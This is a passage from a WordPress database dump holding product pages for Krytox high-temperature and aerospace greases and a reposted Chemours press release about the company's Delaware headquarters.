src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-240ac', '', '', '2017-08-18 17:21:41', '2017-08-18 17:21:41', '', 0, 'https://132.148.10.86/wordpress/product/240ac/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (645, 2, '2016-08-22 17:43:06', '2016-08-22 17:43:06', '<h2>Krytox 240AD Aerospace &amp; Aviation Grease</h2>\r\nApplications for Krytox 240AD lubricants are generally of a critical nature with temperatures in all industries reaching extremes for conventional lubricants. They are expected to be durable in the most aggressive environments and are now often considered an integral part of the design. Where failure of components is not an option, whether because of durability, warranty, safety, loss of productivity or down time, Krytox is the lubricant of choice in a wide range of industries and applications.\r\n\r\nIn the aerospace industry, Krytox 240AD grease is applied in various settings spanning from bearings and sealants to o-rings and oxygen systems. Krytox is a valuable asset to the aerospace industry due to its superior performance in a wide range of temperatures scaling from 70 to 399ºC (–100 to 750 ºF). In addition, it is robust in harsh environments and has excellent frictional properties, allowing it to resist change in properties over time, provide longer wear, and lower energy consumption. Krytox lubricants are compatible with all metals, elastomers, plastics, paints, and finishes. Due to the intense and severe circumstance of the aerospace industry, it can be expected that Krytox delivers a high level of product excellence.\r\n\r\nNew bearings and equipment that are not lubricated often have rust preventive oils in them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. The greases or preservative oils need to be removed when using Krytox as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on uncleaned bearings have shown reduced life in high temperature, high-speed tests where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They also will oxidize and harden and can create debris which will contaminate the grease.\r\n\r\nKrytox™ is a trademark of the Chemours Company FC, LLC.', 'Krytox 240AD', 'Krytox 240AD is the highest viscosity grease in the 240 series. With a viscosity of 1540 at 20°C and a viscosity of 502 at 38°C it is ideal for applications that require a thick grease. This grease does not meet the MIL SPEC. \r\n<br><br/>\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-240ad', '', '', '2017-08-18 19:22:41', '2017-08-18 19:22:41', '', 0, 'https://132.148.10.86/wordpress/product/240ad/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (646, 2, '2016-08-22 17:52:45', '2016-08-22 17:52:45', 'Since the first commercial application over 50 years ago, Krytox synthetic lubricants have delivered consistent, superior, extended performance. Today, with new additives for new challenges, Krytox lubricants continue to deliver extreme performance under extreme conditions. Krytox 250AZ is the lubricant of choice for demanding conditions —high and low temperatures, extreme pressure, and harsh environments.\r\n\r\nKrytox greases are used in a variety of limited-motion mount systems associated with aircraft engines, such as an oil tank mount bracket for a Trent 1000 engine.\r\n\r\nKrytox lubricants can be used to improve the performance of traditionally non-lubricated materials, such as DuPont™ Vespel® CR-6100 bushings.\r\n\r\nThe polymer chain is completely saturated and contains only carbon, oxygen, and fluorine. On a weight basis, a typical Krytox oil contains 21.6% carbon, 9.4% oxygen, and 69.0% fluorine.\r\n\r\nAll standard grades of grease are thickened with high efficiency PTFE, whose formula is (CF2-CF2)n. This special high efficiency thickener has a melting point of 325°C (617 °F), and has low molecular weight and submicron (0.2 μ) particle size for higher performance in bearings.\r\n', '250AZ', 'Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.\r\n<br><br />\r\nLowest viscosity in the 250 series.\r\n<br><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-250az', '', '', '2016-10-04 17:57:14', '2016-10-04 17:57:14', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=646', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (647, 2, '2016-08-22 17:54:23', '2016-08-22 17:54:23', '<h2>Krytox 250AC Performance Aerospace &amp; Aviation Grease</h2>\r\n<h3>Molybdenum Disulfide Grease | Extreme pressure additive for highly loaded gears and bearings</h3>\r\nSince the first commercial application over 50 years ago, Krytox synthetic lubricants have delivered consistent, superior, extended performance. Today, with new additives for new challenges, Krytox lubricants continue to deliver extreme performance under extreme conditions. Krytox 250AC is the lubricant of choice for demanding conditions —high and low temperatures, extreme pressure, and harsh environments.\r\n\r\nKrytox greases are used in a variety of limited-motion mount systems associated with aircraft engines, such as an oil tank mount bracket for a Trent 1000 engine.\r\n\r\nKrytox lubricants can be used to improve the performance of traditionally non-lubricated materials, such as DuPont™ Vespel® CR-6100 bushings.\r\n\r\nThe polymer chain is completely saturated and contains only carbon, oxygen, and fluorine. On a weight basis, a typical Krytox oil contains 21.6% carbon, 9.4% oxygen, and 69.0% fluorine.\r\n\r\nAll standard grades of grease are thickened with high efficiency PTFE, whose formula is (CF2-CF2)n. This special high efficiency thickener has a melting point of 325°C (617 °F), and has low molecular weight and submicron (0.2 μ) particle size for higher performance in bearings.', 'Krytox 250AC', 'Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.\r\n<br><br/>\r\nMid-Range viscosity.\r\n<br><br/>\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-250ac', '', '', '2017-08-21 12:40:00', '2017-08-21 12:40:00', '', 0, 'https://132.148.10.86/wordpress/product/250ac/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (648, 2, '2016-08-22 17:54:47', '2016-08-22 17:54:47', '<h2>Krytox 250AD High-Performance Aerospace &amp; Aviation Grease</h2>\r\n<h3>Molybdenum Disulfide Additive Grease | Extreme pressure additive for highly loaded gears and bearings</h3>\r\nSince the first commercial application over 50 years ago, Krytox synthetic lubricants have delivered consistent, superior, extended performance. Today, with new additives for new challenges, Krytox lubricants continue to deliver extreme performance under extreme conditions. Krytox 250AD is the lubricant of choice for demanding conditions —high and low temperatures, extreme pressure, and harsh environments.\r\n\r\nKrytox greases are used in a variety of limited-motion mount systems associated with aircraft engines, such as an oil tank mount bracket for a Trent 1000 engine.\r\n\r\nKrytox lubricants can be used to improve the performance of traditionally non-lubricated materials, such as DuPont™ Vespel® CR-6100 bushings.\r\n\r\nThe polymer chain is completely saturated and contains only carbon, oxygen, and fluorine. On a weight basis, a typical Krytox oil contains 21.6% carbon, 9.4% oxygen, and 69.0% fluorine.\r\n\r\nAll standard grades of grease are thickened with high-efficiency PTFE, whose formula is (CF2-CF2)n. This special high-efficiency thickener has a melting point of 325°C (617 °F) and has low molecular weight and submicron (0.2 μ) particle size for higher performance in bearings.\r\n\r\nKrytox™ is a trademark of the Chemours Company FC, LLC.', 'Krytox 250AD', 'Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.\r\n<br><br/>\r\nHighest viscosity in the 250 Series.\r\n<br><br/>\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-250ad', '', '', '2017-08-21 12:56:29', '2017-08-21 12:56:29', '', 0, 'https://132.148.10.86/wordpress/product/250ad/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (649, 2, '2016-08-22 19:26:55', '2016-08-22 19:26:55', '', '280AB', 'Krytox 283 series anticorrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.\r\n<br><br />\r\nKrytox 280 Series contain 1% sodium nitrite.\r\n<br><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-280ab', '', '', '2016-09-27 22:50:22', '2016-09-27 22:50:22', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=649', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (651, 2, '2016-08-22 19:27:33', '2016-08-22 19:27:33', '', '280AC', 'Krytox 283 series anticorrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.\r\n<br><br />\r\nKrytox 280 Series contain 1% sodium nitrite.\r\n<br><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-280ac', '', '', '2016-09-27 22:51:43', '2016-09-27 22:51:43', '', 0, 'https://132.148.10.86/wordpress/product/280ac/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (652, 2, '2016-08-22 19:30:48', '2016-08-22 19:30:48', '', '283AZ', 'Krytox 283 series anticorrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.\r\n<br /><br />\r\nKrytox 280 Series contain 1% sodium nitrite whereas Krytox 283 Series contain 5% sodium nitrite.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-283az', '', '', '2016-09-27 22:59:37', '2016-09-27 22:59:37', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=652', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (653, 2, '2016-08-22 19:32:17', '2016-08-22 19:32:17', '', '283AA', 'Krytox 283 series anticorrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.\r\n<br><br />\r\nKrytox 283 Series contains 5% sodium nitrite. 283AA is also the second lowest viscosity.\r\n<br><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-283aa', '', '', '2016-09-27 22:52:38', '2016-09-27 22:52:38', '', 0, 'https://132.148.10.86/wordpress/product/283aa/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (654, 2, '2016-08-22 19:32:39', '2016-08-22 19:32:39', '', '283AB', 'Krytox 283 series anticorrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.\r\n<br><br />\r\nKrytox 283 Series contains 5% sodium nitrite. 283AB also has a mid-range viscosity.\r\n<br><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-283ab', '', '', '2016-09-27 22:53:35', '2016-09-27 22:53:35', '', 0, 'https://132.148.10.86/wordpress/product/283ab/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (655, 2, '2016-08-22 19:33:00', '2016-08-22 19:33:00', '', '283AC', 'Krytox 283 series anticorrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.\r\n<br /><br />\r\nKrytox 283 Series contains 5% sodium nitrite.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-283ac', '', '', '2016-09-27 22:55:49', '2016-09-27 22:55:49', '', 0, 'https://132.148.10.86/wordpress/product/283ac/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (656, 2, '2016-08-22 19:33:20', '2016-08-22 19:33:20', '', '283AD', 'Krytox 283 series anticorrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.\r\n<br /><br />\r\nKrytox 283 Series contains 5% sodium nitrite.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-283ad', '', '', '2016-09-27 22:57:13', '2016-09-27 22:57:13', '', 0, 'https://132.148.10.86/wordpress/product/283ad/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (659, 2, '2016-08-22 19:57:27', '2016-08-22 19:57:27', 'Krytox XHT-S and XHT-SX greases are special high temperature greases with low oil evaporation that provide long bearing life and are compatible with most elastomers and plastics. These greases provide excellent lubrication over a broad temperature range, but are designed to work best at temperatures over 200 °C (400 °F). Krytox XHT-S series greases are nonflammable, oxygencompatible, chemically inert, and provide extended lubrication intervals and longer equipment life.\r\n\r\nThe Krytox XHT-S series greases are an extension of the Krytox GPL 240 series and Krytox GPL 20X series, but are designed to give higher performance in the 204–302 °C (400–575 °F) range. Krytox™ XHT-S series greases should be used below 320 °C (608 °F), where the polytetrafluoroethylene (PTFE) thickener could begin to melt. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. Krytox XHT-S series greases contain no additives, so they are used when a potential for interaction between process chemicals and grease additives exists.\r\n\r\nKrytox grease is made to a standard NLGI grade 2. PTFE is the standard thickener.\r\n\r\n<strong>Typical Applications</strong>\r\n\r\nApplications for these lubricants are generally of a critical nature, such as when temperatures reach extremes that conventional lubricants cannot handle. Krytox™ XHT-S and XHT-SX greases are expected to be durable in highly aggressive environments. Where failure of components is not an option, because of durability, warranty, safety, loss of productivity, or downtime, Krytox™ lubricants are the ideal choice in a wide range of industries and applications.\r\n\r\n<strong>Compatibility with Metals</strong>\r\nBecause of their low surface tensions, Krytox lubricants easily wet metallic surfaces. Krytox lubricants are chemically inert and, therefore, have no adverse effect on metals when the temperature is below 288 °C (550 °F). Above 288 °C (550 °F), many alloy steels, stainless steels, and other metals, such as aluminum alloy, titanium alloy, nickel alloy, and cobalt alloy, can be used with Krytox lubricants.', 'XHT-S', 'Krytox XHT-S and XHT-SX greases are special high temperature greases with low oil evaporation that provide long bearing life and are compatible with most elastomers and plastics. These greases provide excellent lubrication over a broad temperature range, but are designed to work best at temperatures over 200 °C (400 °F).\r\n<br /><br />\r\nLowest viscosity grease in the XHT-S Series.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />\r\n', 'publish', 'open', 'closed', '', 'krytox-xht-s', '', '', '2016-10-05 18:23:15', '2016-10-05 18:23:15', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=659', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (660, 2, '2016-10-05 18:22:47', '2016-10-05 18:22:47', 'Krytox XHT-S and XHT-SX greases are special high temperature greases with low oil evaporation that provide long bearing life and are compatible with most elastomers and plastics. These greases provide excellent lubrication over a broad temperature range, but are designed to work best at temperatures over 200 °C (400 °F). Krytox XHT-S series greases are nonflammable, oxygencompatible, chemically inert, and provide extended lubrication intervals and longer equipment life.\n\nThe Krytox XHT-S series greases are an extension of the Krytox GPL 240 series and Krytox GPL 20X series, but are designed to give higher performance in the 204–302 °C (400–575 °F) range. Krytox™ XHT-S series greases should be used below 320 °C (608 °F), where the polytetrafluoroethylene (PTFE) thickener could begin to melt. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. Krytox XHT-S series greases contain no additives, so they are used when a potential for interaction between process chemicals and grease additives exists.\n\nKrytox grease is made to a standard NLGI grade 2. PTFE is the standard thickener.\n\n<strong>Typical Applications</strong>\n\nApplications for these lubricants are generally of a critical nature, such as when temperatures reach extremes that conventional lubricants cannot handle. Krytox™ XHT-S and XHT-SX greases are expected to be durable in highly aggressive environments. Where failure of components is not an option, because of durability, warranty, safety, loss of productivity, or downtime, Krytox™ lubricants are the ideal choice in a wide range of industries and applications.\n\n<strong>Compatibility with Metals</strong>\nBecause of their low surface tensions, Krytox lubricants easily wet metallic surfaces. Krytox lubricants are chemically inert and, therefore, have no adverse effect on metals when the temperature is below 288 °C (550 °F). Above 288 °C (550 °F), many alloy steels, stainless steels, and other metals, such as aluminum alloy, titanium alloy, nickel alloy, and cobalt alloy, can be used with Krytox lubricants.', 'XHT-S', 'Krytox XHT-S and XHT-SX greases are special high temperature greases with low oil evaporation that provide long bearing life and are compatible with most elastomers and plastics. These greases provide excellent lubrication over a broad temperature range, but are designed to work best at temperatures over 200 °C (400 °F).\n<br /><br />\nLowest viscosity grease in the XHT-S Series.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />\n', 'inherit', 'closed', 'closed', '', '659-autosave-v1', '', '', '2016-10-05 18:22:47', '2016-10-05 18:22:47', '', 659, 'https://132.148.10.86/wordpress/659-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (662, 1, '2016-08-22 20:26:04', '2016-08-22 20:26:04', 'WILMINGTON, Del., Aug. 2, 2016 /PRNewswire/ -- Today, Chemours is announcing that it will locate its global headquarters in Wilmington, Delaware.\r\n\r\n"While we like to think of ourselves as a 200-year-old start-up, we\'ve been an independent, publicly traded company for only just over a year now," said President and CEO Mark Vergnano.  "We\'ve accomplished a good deal in a short time, standing up Chemours and making a host of decisions that ensure a sound and prosperous future.  We have considered a number of locations for our world headquarters, but in the end it came down to what locale makes the most financial sense, offers our current workforce the right combination of amenities and conveniences, and allows us to attract great talent.  Wilmington is that place, and we look forward to being part of its future growth."\r\n\r\nChemours began evaluating headquarters location options more than 6 months ago with Delaware, New Jersey, and Pennsylvania all under active consideration.  The company followed a disciplined evaluation process against a range of criteria, including quality of life for employees, access to a strong talent pool, and a positive, long-term financial case for the company.\r\n\r\n"Chemours has a first-rate workforce, and the state of Delaware has a rich talent pool, so we believe Delaware\'s a great place for maintaining our superb employee base. That\'s a competitive advantage for us," Vergnano added. \r\n\r\nRecent changes to the state\'s corporate tax structure brought about by the Delaware Competes Act, which was approved earlier this year with overwhelming, bi-partisan support of the Delaware legislature, were key components in Chemours\' decision.\r\n\r\n"Today\'s announcement is the result of strong support from Delaware\'s elected officials at the federal, state and local levels, notably Governor Jack Markell, who spearheaded passage of the Delaware Competes Act along with Senate President Pro-Tem Patricia Blevins and House Majority Leader Valerie Longhurst.  Solid relationships with Wilmington Mayor Dennis Williams, United States Senators Tom Carper, and Chris Coons, as well as Congressman John Carney also helped drive our decision.  Chemours has enjoyed substantive dialogue with these leaders about issues of importance to our company, employees and future," said Vergnano.\r\n\r\nAbout The Chemours Company\r\nThe Chemours Company (NYSE: CC) helps create a colorful, capable and cleaner world through the power of chemistry.  Chemours is a global leader in titanium technologies, fluoroproducts and chemical solutions, providing its customers with solutions in a wide range of industries with market-defining products, application expertise and chemistry-based innovations.  Chemours ingredients are found in plastics and coatings, refrigeration and air conditioning, mining and oil refining operations and general industrial manufacturing.  Our flagship products include prominent brands such as Teflon, Ti-Pure™, Krytox, Viton™, Opteon™ and Nafion™.  Chemours has approximately 8,000 employees across 35 manufacturing sites serving more than 5,000 customers in North America, Latin America, Asia-Pacific and Europe.  Chemours is headquartered in Wilmington, Delaware and is listed on the NYSE under the symbol CC.  For more information please visit chemours.com.\r\n\r\nForward-Looking Statements\r\nThis press release contains forward-looking statements, which often may be identified by their use of words like "plans," "expects," "will," "believes," "intends," "estimates," "anticipates" or other words of similar meaning. These forward-looking statements address, among other things, our anticipated future operating and financial performance, business plans and prospects, transformation plans, resolution of environmental liabilities, litigation and other contingencies, plans to increase profitability, our ability to pay or the amount of any dividend, and target leverage that are subject to substantial risks and uncertainties that could cause actual results to differ materially from those expressed or implied by such statements. Forward-looking statements are not guarantees of future performance and are based on certain assumptions and expectations of future events which may not be realized. The matters discussed in these forward-looking statements also are subject to risks, uncertainties and other factors that could cause actual results to differ materially from those projected, anticipated or implied in the forward-looking statements, as further described in our filings with the Securities and Exchange Commission, including our annual report on Form 10-K for the fiscal year ended December 31, 2015. Chemours undertakes no duty to update any forward-looking statements.', 'The Chemours Company Selects Wilmington, Delaware for Its Global Headquarters', '', 'publish', 'open', 'open', '', 'the-chemours-company-selects-wilmington-delaware-for-its-global-headquarters', '', '', '2016-08-22 20:34:27', '2016-08-22 20:34:27', '', 0, 'https://132.148.10.86/wordpress/?p=662', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (663, 1, '2016-08-22 20:25:55', '2016-08-22 20:25:55', 'WILMINGTON, Del., Aug. 2, 2016 /PRNewswire/ -- Today, Chemours is announcing that it will locate its global headquarters in Wilmington, Delaware.\r\n\r\n"While we like to think of ourselves as a 200-year-old start-up, we\'ve been an independent, publicly traded company for only just over a year now," said President and CEO Mark Vergnano.  "We\'ve accomplished a good deal in a short time, standing up Chemours and making a host of decisions that ensure a sound and prosperous future.  We have considered a number of locations for our world headquarters, but in the end it came down to what locale makes the most financial sense, offers our current workforce the right combination of amenities and conveniences, and allows us to attract great talent.  Wilmington is that place, and we look forward to being part of its future growth."\r\n\r\nChemours began evaluating headquarters location options more than 6 months ago with Delaware, New Jersey, and Pennsylvania all under active consideration.  The company followed a disciplined evaluation process against a range of criteria, including quality of life for employees, access to a strong talent pool, and a positive, long-term financial case for the company.\r\n\r\n"Chemours has a first-rate workforce, and the state of Delaware has a rich talent pool, so we believe Delaware\'s a great place for maintaining our superb employee base. That\'s a competitive advantage for us," Vergnano added. \r\n\r\nRecent changes to the state\'s corporate tax structure brought about by the Delaware Competes Act, which was approved earlier this year with overwhelming, bi-partisan support of the Delaware legislature, were key components in Chemours\' decision.\r\n\r\n"Today\'s announcement is the result of strong support from Delaware\'s elected officials at the federal, state and local levels, notably Governor Jack Markell, who spearheaded passage of the Delaware Competes Act along with Senate President Pro-Tem Patricia Blevins and House Majority Leader Valerie Longhurst.  Solid relationships with Wilmington Mayor Dennis Williams, United States Senators Tom Carper, and Chris Coons, as well as Congressman John Carney also helped drive our decision.  Chemours has enjoyed substantive dialogue with these leaders about issues of importance to our company, employees and future," said Vergnano.\r\n\r\nAbout The Chemours Company\r\nThe Chemours Company (NYSE: CC) helps create a colorful, capable and cleaner world through the power of chemistry.  Chemours is a global leader in titanium technologies, fluoroproducts and chemical solutions, providing its customers with solutions in a wide range of industries with market-defining products, application expertise and chemistry-based innovations.  Chemours ingredients are found in plastics and coatings, refrigeration and air conditioning, mining and oil refining operations and general industrial manufacturing.  Our flagship products include prominent brands such as Teflon, Ti-Pure™, Krytox, Viton™, Opteon™ and Nafion™.  Chemours has approximately 8,000 employees across 35 manufacturing sites serving more than 5,000 customers in North America, Latin America, Asia-Pacific and Europe.  Chemours is headquartered in Wilmington, Delaware and is listed on the NYSE under the symbol CC.  For more information please visit chemours.com.\r\n\r\nForward-Looking Statements\r\nThis press release contains forward-looking statements, which often may be identified by their use of words like "plans," "expects," "will," "believes," "intends," "estimates," "anticipates" or other words of similar meaning. These forward-looking statements address, among other things, our anticipated future operating and financial performance, business plans and prospects, transformation plans, resolution of environmental liabilities, litigation and other contingencies, plans to increase profitability, our ability to pay or the amount of any dividend, and target leverage that are subject to substantial risks and uncertainties that could cause actual results to differ materially from those expressed or implied by such statements. Forward-looking statements are not guarantees of future performance and are based on certain assumptions and expectations of future events which may not be realized. The matters discussed in these forward-looking statements also are subject to risks, uncertainties and other factors that could cause actual results to differ materially from those projected, anticipated or implied in the forward-looking statements, as further described in our filings with the Securities and Exchange Commission, including our annual report on Form 10-K for the fiscal year ended December 31, 2015. Chemours undertakes no duty to update any forward-looking statements.', 'The Chemours Company Selects Wilmington, Delaware for Its Global Headquarters', '', 'inherit', 'closed', 'closed', '', '662-revision-v1', '', '', '2016-08-22 20:25:55', '2016-08-22 20:25:55', '', 662, 'https://132.148.10.86/wordpress/662-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (664, 1, '2016-08-22 20:28:01', '2016-08-22 20:28:01', '###articles###', 'Articles', '', 'publish', 'closed', 'closed', '', 'articles', '', '', '2016-10-17 18:42:07', '2016-10-17 18:42:07', '', 0, 'https://132.148.10.86/wordpress/?page_id=664', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (665, 1, '2016-08-22 20:27:50', '2016-08-22 20:27:50', '', 'Articles', '', 'inherit', 'closed', 'closed', '', '664-revision-v1', '', '', '2016-08-22 20:27:50', '2016-08-22 20:27:50', '', 664, 'https://132.148.10.86/wordpress/664-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (666, 1, '2016-08-22 20:28:01', '2016-08-22 20:28:01', ' ', '', '', 'publish', 'closed', 'closed', '', '666', '', '', '2016-08-22 20:28:01', '2016-08-22 20:28:01', '', 0, 'https://132.148.10.86/wordpress/666/', 3, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (668, 1, '2016-08-22 20:33:01', '2016-08-22 20:33:01', '###articles###', 'Articles', '', 'inherit', 'closed', 'closed', '', '664-revision-v1', '', '', '2016-08-22 20:33:01', '2016-08-22 20:33:01', '', 664, 'https://132.148.10.86/wordpress/664-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (670, 1, '2016-08-22 20:41:33', '2016-08-22 20:41:33', ' ', '', '', 'publish', 'closed', 'closed', '', '670', '', '', '2017-08-18 15:11:22', '2017-08-18 15:11:22', '', 0, 'https://132.148.10.86/wordpress/?p=670', 12, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (671, 2, '2016-08-23 12:24:24', '2016-08-23 12:24:24', 'Krytox XHT-SX grease is a special high temperature greases with low oil evaporation that provide long bearing life and are compatible with most elastomers and plastics. These greases provide excellent lubrication over a broad temperature range, but are designed to work best at temperatures over 200 °C (400 °F). Krytox XHT-SX grease is nonflammable, oxygencompatible, chemically inert, and provide extended lubrication intervals and longer equipment life.\r\n\r\nThe Krytox XHT-SX grease is an extension of the Krytox GPL 240 series and Krytox GPL 20X series, but are designed to give higher performance in the 204–302 °C (400–575 °F) range. Krytox™ XHT-S series greases should be used below 320 °C (608 °F), where the polytetrafluoroethylene (PTFE) thickener could begin to melt. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. Krytox XHT-SX grease contains no additives, so they are used when a potential for interaction between process chemicals and grease additives exists.\r\n\r\nKrytox grease is made to a standard NLGI grade 2. PTFE is the standard thickener.\r\n\r\n<strong>Typical Applications</strong>\r\n\r\nApplications for these lubricants are generally of a critical nature, such as when temperatures reach extremes that conventional lubricants cannot handle. Krytox™ XHT-S and XHT-SX greases are expected to be durable in highly aggressive environments. Where failure of components is not an option, because of durability, warranty, safety, loss of productivity, or downtime, Krytox™ lubricants are the ideal choice in a wide range of industries and applications.\r\n\r\n<strong>Compatibility with Metals</strong>\r\nBecause of their low surface tensions, Krytox lubricants easily wet metallic surfaces. Krytox lubricants are chemically inert and, therefore, have no adverse effect on metals when the temperature is below 288 °C (550 °F). Above 288 °C (550 °F), many alloy steels, stainless steels, and other metals, such as aluminum alloy, titanium alloy, nickel alloy, and cobalt alloy, can be used with Krytox lubricants.\r\n', 'XHT-SX', 'Krytox XHT-S and XHT-SX greases are special high temperature greases with low oil evaporation that provide long bearing life and are compatible with most elastomers and plastics. These greases provide excellent lubrication over a broad temperature range, but are designed to work best at temperatures over 200 °C (400 °F).\r\n<br /><br />\r\nHighest viscosity grease in the XHT-S series.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-xht-sx', '', '', '2016-10-05 18:29:09', '2016-10-05 18:29:09', '', 0, 'https://132.148.10.86/wordpress/product/xht-sx/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (672, 2, '2016-08-23 12:50:27', '2016-08-23 12:50:27', 'Krytox XHT AC grease is a special high temperature greases with low oil evaporation that provide anti-wear and rusting protection, and are compatible with all elastomers and plastics. These greases have excellent lubrication over a broad temperature range, but are designed to work best at temperatures over 200 °C (400°F). Krytox XHT AC series greases are nonflammable, oxygen-compatible, and chemically inert. Krytox greases provide extended lubrication intervals and longer equipment life.\r\n\r\nThe Krytox XHT AC series greases are an extension of the Krytox 240 series and Krytox GPL 22X series, but are designed to give higher performance in the 204–302°C (400–575 °F) range. Krytox™ XHT-AC series greases contain sodium nitrite to offer anti-corrosion performance. These greases should be used below 320 °C (608 °F), where the polytetrafluoroethylene (PTFE) thickener could begin to melt. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. Krytox grease is made to a standard NLGI grade 2. PTFE is the standard thickener.\r\n\r\nApplications for these lubricants are generally of a critical nature, such as when temperatures reach extremes that conventional lubricants cannot handle. Krytox XHT AC and XHT ACX greases are expected to be durable in highly aggressive environments. Where failure of components is not an option, because of durability, warranty, safety, loss of productivity, or downtime, Krytox lubricants are the ideal choice in a wide range of industries and applications.\r\n\r\n<strong>Compatibility with Metals</strong>\r\nBecause of their low surface tensions, Krytox lubricants easily wet metallic surfaces. Krytox lubricants are chemically inert and, therefore, have no adverse effect on metals when the temperature is below 288 °C (550 °F). Above 288 °C (550 